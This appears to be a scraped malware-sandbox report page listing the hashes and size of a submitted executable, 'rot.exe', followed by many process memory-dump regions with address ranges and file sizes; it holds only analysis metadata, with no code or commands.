8e84b0c6c1a14a1a17d565cb87b32a8a3020cc1ff8fe3f7b0f5eb2b4213a28f7a91eefec82ecb24a182e9d9ec37e9e2cf65c4c6cbd877cdc6c55b0c42fb85f99

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
24.6MB

MD5
a6541233a564896e50b181ddce9451ad

SHA1
c2c4827ebfc3616c986e922145995293e7a5c5a4

SHA256
3b0d82cc812d3c982bc49c342fedfff4ee5819ba0879b42805f2bfb04b53fc0e

SHA512
14e20a5574461b2c732f2b22992d552ffdec7c2e027a3cb163a0be13a777ccc7dff1cf63d9260812bf49d4643991538b1754882febc6dea2e44e55d4578a7f74

Download Submit
memory/1352-80-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/1352-78-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/1352-66-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/1352-67-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/1832-33-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/1832-16-0x00000000056F0000-0x0000000005D18000-memory.dmp

Filesize
6.2MB

Download
memory/1832-13-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/1832-14-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/1832-15-0x0000000005000000-0x0000000005036000-memory.dmp

Filesize
216KB

Download
memory/1832-17-0x0000000005600000-0x0000000005622000-memory.dmp

Filesize
136KB

Download
memory/1832-30-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/1832-29-0x00000000065E0000-0x00000000065FE000-memory.dmp

Filesize
120KB

Download
memory/1832-18-0x0000000005ED0000-0x0000000005F36000-memory.dmp

Filesize
408KB

Download
memory/1832-19-0x0000000005FB0000-0x0000000006016000-memory.dmp

Filesize
408KB

Download
memory/2384-97-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2384-101-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/2384-105-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/3236-170-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/3236-160-0x00000000008A0000-0x0000000000A56000-memory.dmp

Filesize
1.7MB

Download
memory/3236-168-0x00000000054F0000-0x0000000005500000-memory.dmp

Filesize
64KB

Download
memory/3236-167-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/3236-162-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/4488-109-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/4488-142-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/4488-122-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4488-123-0x0000000006050000-0x0000000006082000-memory.dmp

Filesize
200KB

Download
memory/4488-124-0x0000000070510000-0x000000007055C000-memory.dmp

Filesize
304KB

Download
memory/4488-134-0x0000000006030000-0x000000000604E000-memory.dmp

Filesize
120KB

Download
memory/4488-135-0x0000000007430000-0x0000000007AAA000-memory.dmp

Filesize
6.5MB

Download
memory/4488-136-0x0000000006E10000-0x0000000006E2A000-memory.dmp

Filesize
104KB

Download
memory/4488-137-0x0000000006E60000-0x0000000006E6A000-memory.dmp

Filesize
40KB

Download
memory/4488-138-0x0000000007090000-0x0000000007126000-memory.dmp

Filesize
600KB

Download
memory/4488-139-0x0000000007030000-0x000000000703E000-memory.dmp

Filesize
56KB

Download
memory/4488-140-0x0000000007150000-0x000000000716A000-memory.dmp

Filesize
104KB

Download
memory/4488-141-0x0000000007080000-0x0000000007088000-memory.dmp

Filesize
32KB

Download
memory/4488-156-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/4488-143-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4488-144-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4488-145-0x00000000071A0000-0x00000000071C2000-memory.dmp

Filesize
136KB

Download
memory/4488-146-0x0000000008060000-0x0000000008604000-memory.dmp

Filesize
5.6MB

Download
memory/4488-110-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4488-148-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4652-176-0x0000000000420000-0x00000000005D6000-memory.dmp

Filesize
1.7MB

Download
memory/4720-36-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/4720-35-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/4720-37-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/4720-48-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/4720-50-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/4748-151-0x0000000000EC0000-0x0000000001076000-memory.dmp

Filesize
1.7MB

Download
memory/4748-153-0x0000000005750000-0x00000000057EC000-memory.dmp

Filesize
624KB

Download
memory/4748-161-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/4748-158-0x0000000005810000-0x000000000581A000-memory.dmp

Filesize
40KB

Download
memory/4748-163-0x0000000005B20000-0x0000000005B30000-memory.dmp

Filesize
64KB

Download
memory/4748-164-0x0000000005B20000-0x0000000005B30000-memory.dmp

Filesize
64KB

Download
memory/4748-166-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/4748-152-0x00000000746F0000-0x0000000074EA0000-memory.dmp

Filesize
7.7MB

Download
memory/4748-157-0x0000000005B20000-0x0000000005B30000-memory.dmp

Filesize
64KB

Download
memory/4748-155-0x0000000005890000-0x0000000005922000-memory.dmp

Filesize
584KB

Download
memory/4768-81-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/4768-94-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/4768-82-0x0000000004CF0000-0x0000000004D00000-memory.dmp

Filesize
64KB

Download
memory/4776-64-0x00000000028D0000-0x00000000028E0000-memory.dmp

Filesize
64KB

Download
memory/4776-51-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download
memory/4776-52-0x00000000028D0000-0x00000000028E0000-memory.dmp

Filesize
64KB

Download
memory/4776-65-0x00000000747C0000-0x0000000074F70000-memory.dmp

Filesize
7.7MB

Download